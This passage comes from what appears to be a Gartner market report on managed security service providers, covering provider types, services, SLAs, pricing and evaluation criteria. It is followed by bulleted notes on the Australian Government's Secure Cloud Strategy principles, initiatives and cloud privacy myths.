  • Lack of customization: By definition, MSSs are meant to be standardized in terms of device management, analytics/correlation rules, and reporting and notifications. Customers that want more customization of their security operations may find that some MSSPs may be less than ideal for them if they focus on delivering shared services with little to no customization.

MSSP Landscape

The basic makeup of the MSSP vendor space has not changed fundamentally as the market is mature. There are three major types of MSSPs. Overlap between these types occurs in the market, but MSSPs tends to fall into one of the categories.

  • Pure plays: These are generally smaller, privately held MSSPs that are completely focused on security services. Most of these MSSPs tend to serve a local market or region, but not all regions around the world. New pure-play security service providers often focus on specific vertical markets (e.g., legal, healthcare providers, energy and utilities) or regulatory requirements, or advanced threat detection technologies (e.g., managed EDR services). Gartner expects existing MSSPs and other IT services firms to acquire pure-play service providers that offer threat-detection-oriented services and advanced threat detection capabilities, especially those in the MDR space.
  • NSPs: These are network bandwidth and connectivity providers that manage and monitor network security products. They often provide remote monitoring, premises-based technologies and cloud-based services through their internet connections. Buyers that consume managed telecommunications services tend to include MSS when available as firewalls and other network-based security technologies can be a core component of the outsourcing deals.
  • ITOs/system integrators/business process outsourcers: These are IT services providers that typically manage security devices as part of large outsourcing or system integrations initiatives, where it makes sense for buyers to consume MSS as part of broad infrastructure management and monitoring deals.

In addition to the above common types of MSSPs, security consulting providers and some product vendors are emerging entrants offering MSSs. Security consulting has realized that MSS and ongoing security operations contracts are more of a profitable, predictable and faster-growing revenue stream than one-off consulting projects. Many of these consultants are more active in dedicated SOC staffing services than MSS, but this is still a category of providers to watch. Also worth noting is that many IT outsourcers with security consulting businesses are also becoming more active as MSSPs, through either acquisitions or the organic build-out of capabilities.

Some product vendors such as Cisco, CrowdStrike, F-Secure, FireEye and Rapid7 (among others) also offer MSS and/or MDR services. The primary motivation for these technology vendors in entering this market has been to increase their recurring revenue by attaching more annuity-based services to one-time product sales. Also, for new product areas in security (like EDR), offering managed services allows customers to better utilize the underlying technology product (because it can be more complex and time-consuming than anticipated once fully deployed) and helps them overcome skills shortages associated with newer security technology areas. However, product vendors are still very much a niche play in the broader MSS market.

MSS Portfolio

The services that are core to MSS offerings involve vendor-agnostic monitoring and management of core security technologies, with a focus on:

  • Firewalls and next-generation firewalls (NGFs)
  • Network IDPSs and next-generation IDPS
  • Multifunction firewalls/UTMs
  • SWGs and URL filters
  • EPPs

MSSPs also tend to support a broad scope of security and non-security-type data sources for security event monitoring. The event sources may include network devices (e.g., VPN devices, routers and switches), logs from user directory services (e.g., Active Directory), and host OS logs and application-specific logs. In the past couple of years, MSSPs have introduced services to manage and monitor both proprietary and commercial technologies designed to detect and protect against advanced threats. These services analyze payloads to detect malicious software and monitor activity and behavior of network traffic (e.g., network traffic analysis [NTA] tools) and endpoints (e.g., EDR agents). In addition to monitoring, many MSSPs have management services for those technologies (usually under their “MDR services”).

MSSPs may also provide cloud or SaaS-based services, including:

  • Vulnerability scanning
  • Network-based firewall/IDP
  • Web filtering/SWG
  • CASB
  • Email security
  • DDoS mitigation

Among organizations that have deployed a SIEM solution, Gartner sees increasing interest in services to monitor or run the SIEM. MSSPs continue to add offerings to support customer-deployed SIEM to accommodate these customers, either in a more customized model or until the customer can be transitioned off their SIEM tool and onto the MSSP’s delivery platform.

Incident Response Services

Most MSSPs offer incident response capabilities to assist customers with investigation and remediation activities. Gartner clients, in light of significant breaches in the news over the last 12 months, are interested in adding retainers for digital forensics and incident response (DFIR) services. MSS customers generally look to their provider for these services in many cases. These activities are available as proactive- and reactive-oriented services, delivered primarily remotely, but on-site as needed. These services are typically available on a consulting basis, and can be purchased as needed, or via a retainer for a set number of hours, with service-level commitments for response time for both remote and on-site support. Prospective customers should confirm with MSSP candidates how much response support is available within the context of the standard monitoring services, and when engaging the incident response retainer is required (for example, does the customer have to authorize use of the hours, or is it preagreed how the MSSP can use those hours?). SLAs are also commonly provided for both remote and on-site support. Customers should confirm the SLAs provided and penalties if SLAs are missed. If the MSSP offers packaged or prepaid retainer hours for incident response activities, then customers should confirm if those hours are available for other security services if they are not needed for incident response (e.g., through proactive services).

Threat Intelligence Capabilities and Services

Requirements for how MSSs leverage threat intelligence, and what premium threat intelligence services are available, appear on Gartner clients’ RFPs with increasing frequency. Buyers are specifically interested in how MSSPs are leveraging threat intelligence (e.g., to improve the prioritization and context around detected incidents). Additionally, rather than procuring advanced or customer-specific threat intelligences services from a third party, MSS buyers are looking first at the capabilities of the MSSP, through subscription-based services. Several MSSPs have dedicated security and threat-oriented research teams to improve their visibility of the threat landscape — that is, the identities, motives, targets, and tactics, techniques, and procedures of external attackers. These services feed their MSS capabilities, but also tend to be resold as advanced threat intelligence offerings, such as customer-specific dark web monitoring services. Those that do not have their own threat research groups often use a mix of one or more third-party threat intelligence providers along with open-source threat intelligence. MSSPs are increasing their support for common threat intelligence description and sharing formats, such as Structured Threat Information Expression (STIX) and Trusted Automated Exchange of Indicator Information (TAXII). In the last 12 months, a few MSSPs have also introduced threat intelligence platforms as part of their overall delivery platforms (see “Market Guide for Security Threat Intelligence Products and Services” ). As their use and the maturity of these tools increase, Gartner expects to see improved capabilities for customers to securely share and allow the MSS to consume provided threat intelligence. Buyers with requirements for this level of sharing should confirm with prospective MSSPs if they already have this capability, and if not, where it is in their roadmap.

MSS Delivery

Managed Service Portal Functionality

Buyers should apply significant focus to methods of communication with their provider, as this enables measurable recognition of value received. A key way to orchestrate efficient two-way recorded dialogue between outsourced security professionals and internal teams is through a fully featured portal. Any portal should provide multirole and granular access control, and dashboards with information preconfigured and adaptable to fit many different roles and functions within your organization, including those within senior risk management. Fully interactive incident ticketing with features for handover and resolution tracking provide buyers with a method not only to improve the service that the provider is operating through enrichment and semantic learning, but also to track and manage ROI in an area visible to both parties. Important features of provider portals also include the ability to search through security data and carry out threat hunting through fast and intuitive interfaces as well as seamless cross-service and function integrations with other security services and information, such as vulnerability scanning outputs and threat intelligence indicators.

Buyers should consider the quality and functionality of the provider portal to be a high-priority element in their decision to procure any MSS, as this becomes the outlet and store for all content that the service produces and is measured by.

Security Operations Centers

All MSSPs leverage SOCs as the physical locations to deliver 24/7 services. MSSPs use different patterns for service delivery, usually either from a SOC operating round-the-clock, using a follow-the-sun approach with operation during local business hours seven days per week, or for resiliency as needed, or a hybrid of these two models. Each has its strengths and weaknesses. For example, technically a SOC in one region can support a customer in another; however, there are potentially significant roadblocks in the form of language, time zones and regulations that need to be considered. On the other hand, better service may be achieved when the MSSP uses a follow-the-sun model which can alleviate SOC analyst quality issues that arise when analysts have to work nights and weekends (see “How to Plan, Design, Operate and Evolve a SOC” ). MSS buyers need to carefully evaluate the SOC locations and operating models used by MSSPs to ensure they will meet their requirements.

Threat Detection and Advanced Analytics Capabilities

Many MSSPs claim capabilities to assist their customers in addressing advanced attacks, in addition to their abilities to detect common, broad-based threats. These capabilities may be visible as discrete service offerings or options, or as features embedded in existing offerings. They may include, for example:

  • Correlation of events with threat intelligence that can provide attribution (e.g., to a broad-based malware family versus known hacking group)
  • Analysis of activity patterns (across an MSS customer base as well as within the customer environment) to identify outliers, exceptions or deviations from baselines in security events, network traffic, or the activity of users or entities on the network
  • Analysis of user behavior to identify anomalies from normal behavior across environments (on-premises, cloud) — this is an emerging area that is currently supported by very few MSSPs

The adoption of big data technologies like Hadoop, Elasticsearch and NoSQL is permeating MSS. This makes sense as MSSPs have historically had to deal with “big data problems” — a large volume, velocity and variety of log event and other data. These technologies are being used to help MSSPs better manage and analyze the large amounts and various types of data acquired from their customers, and to make it more accessible (e.g., via real-time search as opposed to scheduled search jobs) and for longer periods of time than what has been previously available. However, the time horizon to search over those logs continues to stay relatively stable, with 90 days of online data being the norm and data older than that being relegated to warm or offline storage. The adoption of big data technologies is also fueling a drive to improve threat detection capabilities through advanced analytics; however, it’s still early days.

As big data technologies are being adopted, advanced analytics are being used in back-end systems to complement traditional real-time security event correlation and monitoring capabilities. Batch-oriented analytics that can be run over much larger datasets covering weeks or months of data, commonly using machine-learning-based approaches, are being employed. Gartner recommends that customers ask for specific information and evidence where advanced analytics is being used as a means of differentiating and comparing service offerings across providers. Most MSSPs claim that the customer won’t be able to determine, based on the alerts they are notified with, whether the event was detected using standard methods, such as correlation or threat intelligence matches, or if it was via a more advanced method (e.g., anomalous activity detected using a supervised machine learning approach). Buyers should also ask about how a provider leverages advanced analytics methods. For example, is the capability through a commercially available technology that is managed by the provider, or has the provider actually invested in R&D to customize and tune a commercial (or proprietary) analytics technology?

Monitoring Beyond On-Premises Customer Environments

SaaS visibility is top of mind with Gartner clients interested in MSS, with IaaS second. Use of popular SaaS like Office 365, Salesforce, Box and Workday are driving the demand. MSSPs are slowly adding support, via partnerships, for CASBs to provide SaaS security monitoring, but few Gartner clients report interest in this approach. Most clients are expecting native API-based approaches to be used as part of the core security event monitoring capabilities. The approach is mixed across MSSPs. Some claim support for APIs, others rely on the use of a CASB solution and a few offer both, depending on the level of event monitoring required by the buyer.

Most MSSPs have focused on the monitoring of assets located in public cloud services, such as AWS and Azure, by leveraging a mix of external security controls deployed in the public cloud and native API-based security integrations (e.g., AWS CloudTrail). Support for Azure has increased over the past 12 months, but AWS is still the most supported environment. Few MSSPs have support for IaaS security products like cloud workload protection platforms (see “Market Guide for Cloud Workload Protection Platforms” ).

There is another dimension to cloud security, and that is security services delivered from the cloud (e.g., security as a service). Some MSSPs support established security-as-a-service technologies (e.g., SWGs and secure email gateways [SEGs]). For example, many of the pure-play providers with their own technology portfolios, and NSPs through partnerships with cloud-based SWG providers, offer management and monitoring services for those deployment modes.

Pricing Models

There are several pricing models used by MSSPs, leading to confusion among buyers as to which approach is most appropriate and making it difficult to compare pricing across competing providers. A majority of MSSPs offer a pricing model based on the type and size of the security technology to be monitored and/or managed for customer-owned security technologies, devices and other log sources. Log collection is typically priced by the number and types of sources, or by the number of events per time period (device count pricing includes implicit expectations of event volumes). There is often a clear distinction between technology that is monitored in real time and subject to alerting SLAs, and technology that is not — that is, where logs are collected and subject to reporting or querying, but not to real-time correlation and analyst review.

Alternative models are also being seen in the market. Gartner expects to see new pricing models introduced as a competitive advantage, and to reduce the complexity and friction with selling MSSs:

  • Data volume or velocity: Providers, especially those using a commercial SIEM solution as part of their delivery platform, are pricing MSSs based on the average volume of data collected over a time period (such as gigabytes per day) or the velocity of data sent to the MSS for analysis (usually measured as log events sent per second or daily). This model allows customers to pay based on the actual amount of data provided to the service provider for analysis, rather than the number or type of data sources. This is not a dominant model in the market. Issues with this model include a lack of control over the amount of data being generated (e.g., during a DDoS attack) and that not all data provides equal benefits, but customers pay the same rate for data collected and analyzed (e.g., web proxy versus DNS events).
  • Per log event source pricing: This pricing model is based on the total number of sources sending data to the MSSP. In this model, all data sources, regardless of how much log and event data they generate, are treated equally. This is sometimes provided as an enterprisewide license model too.
  • Per incident: In this approach, customers are charged based on the number of incidents that are detected and number of alerts notified.
  • Per user or asset: This approach is based on the number of users or assets inside an organization, and based on analytics activities (such as running specific algorithms against a volume of data).

Device management pricing is typically based on the number of configuration changes to be performed within a period of time. This model offers a fairly straightforward means for potential customers to determine the cost of a service and allows comparison across potential providers. A potential issue with this model is that, where customers have high-capacity event sources that are underutilized, they pay for the potential capacity, rather than actual usage of those devices.

Service-Level Agreements

Gartner clients need to be aware of the SLAs offered by MSSPs, as they are a continuing source of misunderstanding by buyers and differences exist across providers. SLAs are commonly offered for monitoring and managed services. Usually, a vendor segregates the SLAs into three to five response levels measured against a specific severity (e.g., urgent, high, medium, low). In many cases, the monitoring and response severities are aligned to managed device SLAs too.

MSS buyers need to confirm the tiers and associated SLAs for the services they plan to buy. Many MSSPs offer various tiers of service at different price points with varying SLAs (e.g., more expensive service will have shorter response times). MSS buyers should confirm the options available with the providers and evaluate which tier they are being quoted, and whether fewer tiers of service might be acceptable given the trade-offs between risks and costs. SLA rightsizing is a critical part of getting the most value from an MSSP. It is also important to confirm how the SLA is measured and calculated. For example, does the clock on an SLA start when the incident is detected by an automated system, when the incident is picked up from a queue of unassigned events by an analyst, or from the time an analyst has established that there is an incident worth notifying the customer about?

Most MSSPs offer standard SLAs; however, some negotiate SLAs on a customer-by-customer basis, while a few others still negotiate custom SLAs for each customer. MSS buyers consuming these services as part of broader IT outsourcing contracts need to be doubly cautious about defining the right SLAs. Gartner has observed several risk areas in such engagements — from providers carrying forward generic SLAs to weak service definitions to poor reimbursements and remediation. Finally, MSS buyers need to confirm whether a provider offers any reimbursements for missed SLAs. Some MSSPs offer credits against future payments for missed SLAs, but this is not common practice across the industry. These can scale to become more severe for multiple occasions of SLA noncompliance. However, there is usually a limit for how many credits can be provided, such as not exceeding a certain percentage of the total monthly or annual charges. Also, sometimes there are earn-back provisions that forgive remedies based on improved performance by the MSSP. It is important to note that, in most cases, it is the customer’s responsibility to notify the service provider of any proposed SLA violation within a set time period of the date on which the proposed violation occurred. At a minimum, the provider should have capabilities for performing a root cause analysis and offering root cause elimination as part of its SLA conformance.

MSSP Market Activity in 2017

The global MSSP market in 2017 was stable. CSC and HPE Enterprise Services formally merged as DXC Technology in April 2017.

MSSPs Not Evaluated in the Magic Quadrant

Not included in this Magic Quadrant analysis are smaller, region-, country-level and local-area MSS providers, which can include small pure plays and larger providers that do not have enough MSS business in multiple regions to meet the inclusion criteria (although they may be a good choice for buyers that don’t require a global footprint and would prefer a more “local” provider). Also excluded from this analysis are service providers that provide MSSs only for their own technologies, and that do not deliver services for third-party commercial technology (for example, MDR service providers). Providers with security services that are sold and delivered primarily with infrastructure outsourcing, staff augmentation or account-dedicated resources are also not included in this Magic Quadrant.

Evidence

  • Gartner customer inquiries and information sharing related to MSSPs
  • Analyst interactions with Gartner customers via inquiries and meetings
  • Survey of MSSPs
  • Survey of MSS reference customers
  • Gartner Peer Insights

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.

Australian Government – Digital Transformation Strategy

Australian Government – Digital Transformation Strategy

 

  • https://www.dta.gov.au/what-we-do/policies-and-programs/secure-cloud/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BWmMXjzgNTV2ysnBsB%2BS3DQ%3D%3D
  • https://www.dta.gov.au/files/cloud-strategy/secure-cloud-strategy.pdf
  • Principle 1: Make risk-based decisions when applying cloud security
  • Principle 2: Design services for the cloud
  • Principle 3: Use public cloud services as the default
  • Principle 4: Use as much of the cloud as possible
  • Principle 5: Avoid customisation and use services ‘as they come’
  • Principle 6: Take full advantage of cloud automation practices
  • Principle 7: Monitor the health and usage of cloud services in real time
  • Initiative 1: Agencies must develop their own cloud strategy
  • Initiative 2: Implement a layered certification model
  • Initiative 3: Redevelop the Cloud Services Panel to align with the procurement recommendations for a new procurement pathway that better supports cloud commodity purchases
  • Initiative 4: Create a dashboard to show service status for adoption, compliance status and services panel status and pricing
  • Initiative 5: Create and publish cloud service qualities baseline and assessment capability
  • Initiative 6: Build a cloud responsibility model supported by a cloud contracts capability
  • Initiative 7: Establish a whole-of-government cloud knowledge exchange
  • Initiative 8: Expand the Building Digital Capability program to include cloud skills
  • Myth 1: The Cloud is not as secure as on premise services
  • Myth 2: Privacy reasons mean government data cannot reside offshore.
  • “Generally, no. The Privacy Act does not prevent an Australian Privacy Principle (APP) entity from engaging a cloud service provider to store or process personal information overseas. The APP entity must comply with the APPs in sending personal information to the overseas cloud service provider, just as they need to for any other overseas outsourcing arrangement. In addition, the Office of the Australian Information Commissioner’s Guide to securing personal information: ‘Reasonable steps’ to protect personal information discusses security considerations that may be relevant under APP 11 when using cloud computing.” https://www.oaic.gov.au/agencies-and-organisations/agency-resources/privacy-agency-resource-4-sending-personalinformation-overseas Additionally, APP 8 provides the criteria for cross-border disclosure of personal information, which ensures the right practices for data residing off-shore are in place. Our Australian privacy frameworks establish the accountabilities to ensure the appropriate privacy and security controls are in place to maintain confidence in our personal information in the cloud.

    Myth 3: Information in the cloud is not managed properly and does not comply with record keeping obligations